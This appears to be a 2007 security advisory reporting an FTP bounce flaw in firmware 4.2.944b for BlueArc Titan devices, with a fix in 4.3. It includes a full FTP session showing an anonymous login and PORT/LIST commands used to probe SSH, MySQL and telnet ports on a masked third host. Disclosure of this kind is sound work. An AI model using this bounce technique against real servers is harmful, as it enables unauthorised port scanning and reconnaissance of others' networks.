BlueArc Firmware 4.2.944b FTP bounce

2007-04-20T00:00:00
ID SECURITYVULNS:DOC:16791
Type securityvulns
Reporter Securityvulns
Modified 2007-04-20T00:00:00

Description

Hi all,

BlueArc Titan 2x00 devices running firmware version 4.2.944b are susceptible to FTP bounce attacks. The vendor has confirmed this, and a fix is available in the 4.3 firmware.

Example: First connect to SSH, success Then to MySQL, no success Then to telnet, no success

[user@localhost ~]$ ftp bluearctitan Connected to bluearctitan. 220 Server ready (BlueArc-FTPD v1.0) Name (bluearctitan:user): anonymous 331 Username okay; need password Password: 230 User logged in, proceed Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "PORT xxx,xxx,xxx,xxx,0,22" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 226 Transfer Complete ftp> quote "PORT xxx,xxx,xxx,xxx,12,234" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 425 Can't open data connection (dtp_list) ftp> quote "PORT xxx,xxx,xxx,xxx,0,23" 200 PORT Command Okay ftp> quote "LIST" 150 File status okay; about to open data connection 425 Can't open data connection (dtp_list)